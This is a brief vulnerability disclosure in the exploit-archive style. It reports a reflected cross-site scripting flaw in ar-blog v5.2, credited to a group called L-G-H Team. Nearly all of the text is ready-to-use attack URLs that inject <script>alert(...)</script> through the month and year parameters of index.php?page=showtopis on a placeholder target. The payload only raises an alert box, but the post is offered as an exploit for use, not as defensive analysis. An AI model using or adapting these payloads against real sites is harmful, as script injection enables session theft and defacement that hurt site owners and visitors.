-2- [XSS] in ar-blog v 5.2
Software: ar-blog
Web Site: http://www.ar-blog.com
Versions: ar-blog v 5.2
Type: Cross Site Scripting
Class: Remote
Exploit :
1-
http://www.target.com/index.php?page=showtopis&month=[XSS]&year=1426&all=9
2-
http://www.target.com/index.php?page=showtopis&month=9&year=[XSS]&all=9
Example :
1-
http://www.target.com/index.php?page=showtopis&month=<script>alert("www.LeZr.Com")</script>
2-
http://www.target.com/index.php?page=showtopis&month=9&year=<script>alert("www.LeZr.Com")</script>&all=9
Discovered by: SAUDI
L-G-H Team
http://www.lezr.com
Regards ///